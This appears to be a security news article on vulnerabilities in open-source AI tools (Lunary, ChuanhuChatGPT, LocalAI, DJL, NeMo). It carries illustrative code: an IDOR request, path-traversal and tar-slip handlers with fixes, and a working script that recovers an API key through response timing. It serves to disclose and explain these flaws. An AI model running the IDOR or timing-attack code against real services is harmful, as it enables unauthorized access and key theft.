Researchers Identify Vulnerabilities in Open-Source AI and ML Models
Over three dozen security vulnerabilities have been found in various open-source AI and ML models, with some capable of enabling remote code execution and data theft. These flaws, discovered in tools such as ChuanhuChatGPT, Lunary, and LocalAI, were reported via Protect AI’s Huntr bug bounty platform.
The most severe of the flaws are two shortcomings impacting Lunary, a production toolkit for large language models (LLMs).
Protect AI detailed an attack scenario where an attacker logs in as User A and intercepts a prompt update request. By altering the 'id' parameter to match a prompt belonging to User B, the attacker can modify User B's prompt without authorization.
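A minimal sketch of that kind of insecure direct object reference (IDOR) probe is shown below. The endpoint path, token, and payload are hypothetical stand-ins for illustration only, not Lunary's actual API.

```python
import requests

# Hypothetical URL, token, and prompt ID used purely for illustration;
# Lunary's real routes and payloads may differ.
BASE_URL = "https://lunary.example.com/api"
ATTACKER_TOKEN = "token-issued-to-user-a"   # attacker is authenticated as User A
VICTIM_PROMPT_ID = "1337"                   # 'id' of a prompt owned by User B

# Replay User A's legitimate "update prompt" request, but with User B's id.
# If the server only verifies that the caller is authenticated and never
# checks object ownership, the update succeeds -- a classic IDOR.
resp = requests.patch(
    f"{BASE_URL}/prompts/{VICTIM_PROMPT_ID}",
    headers={"Authorization": f"Bearer {ATTACKER_TOKEN}"},
    json={"content": "attacker-controlled prompt text"},
    timeout=10,
)
print(resp.status_code)  # a 200 response would indicate the missing ownership check
```

The server-side fix for this class of bug is to scope every lookup to the authenticated user (for example, querying by both the object id and the owner's id) rather than trusting the client-supplied 'id' alone.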
Another critical vulnerability (CVE-2024-5982, CVSS 9.1) involves a path traversal issue in ChuanhuChatGPT’s upload feature, which could lead to arbitrary code execution, unauthorized directory creation, and exposure of sensitive data.
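The flaw class itself is straightforward: if an upload handler joins a user-controlled filename onto its storage directory without normalization, "../" sequences let the file be written anywhere the process can reach. The sketch below shows the generic vulnerable pattern and one mitigation; it is not ChuanhuChatGPT's actual code.

```python
import os

UPLOAD_DIR = "/srv/app/uploads"

def save_upload_unsafe(filename: str, data: bytes) -> str:
    # Vulnerable pattern: the user-supplied name is joined directly, so a
    # value like "../../home/user/.ssh/authorized_keys" escapes UPLOAD_DIR.
    path = os.path.join(UPLOAD_DIR, filename)
    with open(path, "wb") as fh:
        fh.write(data)
    return path

def save_upload_safe(filename: str, data: bytes) -> str:
    # Mitigation: strip any directory components, resolve the final path,
    # and verify it still lives under UPLOAD_DIR before writing.
    path = os.path.realpath(os.path.join(UPLOAD_DIR, os.path.basename(filename)))
    if not path.startswith(os.path.realpath(UPLOAD_DIR) + os.sep):
        raise ValueError("path traversal attempt blocked")
    with open(path, "wb") as fh:
        fh.write(data)
    return path
```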
LocalAI, an open-source platform for running self-hosted LLMs, is affected by two vulnerabilities. One (CVE-2024-6983, CVSS 8.8) could allow arbitrary code execution through a malicious configuration file, while the other (CVE-2024-7010, CVSS 7.5) enables API key guessing via response-time analysis. According to Protect AI, an attacker can exploit this timing side channel to deduce a valid key one character at a time.
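Timing side channels of this kind typically arise when the server compares the supplied key against the stored one with an early-exit, character-by-character comparison: each additional correct leading character makes rejection measurably slower. The sketch below shows the attacker-side loop against a hypothetical protected endpoint; the URL, key length, and alphabet are assumptions for illustration, not LocalAI specifics.

```python
import string
import time
import requests

TARGET = "https://localai.example.com/v1/models"  # hypothetical protected endpoint
ALPHABET = string.ascii_letters + string.digits
KEY_LENGTH = 32                                   # assumed key length, for illustration

def measure(candidate: str, samples: int = 5) -> float:
    """Average response time for a candidate key prefix, padded to full length."""
    padded = candidate.ljust(KEY_LENGTH, "A")
    total = 0.0
    for _ in range(samples):
        start = time.perf_counter()
        requests.get(TARGET, headers={"Authorization": f"Bearer {padded}"}, timeout=10)
        total += time.perf_counter() - start
    return total / samples

recovered = ""
for _ in range(KEY_LENGTH):
    # The character whose rejection is slowest is most likely correct, because
    # the (non-constant-time) comparison advanced one character further.
    timings = {c: measure(recovered + c) for c in ALPHABET}
    recovered += max(timings, key=timings.get)
    print("best guess so far:", recovered)
```

The standard mitigation is a constant-time comparison (for example, Python's hmac.compare_digest), which removes the correlation between response time and the length of the matching prefix.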
Additionally, a remote code execution vulnerability in the Deep Java Library (DJL) (CVE-2024-8396, CVSS 7.8) is linked to an arbitrary file overwrite issue within its untar function.
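DJL is a Java library, but the underlying "tar slip" pattern is language-agnostic: archive entries whose names contain "../" get written outside the extraction directory, overwriting arbitrary files. The following is a generic Python illustration of the vulnerable and hardened extraction logic, not DJL's actual code.

```python
import os
import tarfile

def untar_unsafe(archive: str, dest: str) -> None:
    # Vulnerable pattern: member names such as "../../home/user/.bashrc"
    # are written outside 'dest', overwriting arbitrary files ("tar slip").
    with tarfile.open(archive) as tar:
        tar.extractall(dest)

def untar_safe(archive: str, dest: str) -> None:
    # Mitigation: resolve each member's destination and reject anything
    # that would land outside the extraction directory.
    dest_real = os.path.realpath(dest)
    with tarfile.open(archive) as tar:
        for member in tar.getmembers():
            target = os.path.realpath(os.path.join(dest_real, member.name))
            if not target.startswith(dest_real + os.sep):
                raise ValueError(f"blocked unsafe archive member: {member.name}")
        tar.extractall(dest_real)
```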
The disclosure comes shortly after NVIDIA released patches for a path traversal vulnerability in its NeMo generative AI framework (CVE-2024-0129, CVSS 6.3), which could result in code execution and data tampering.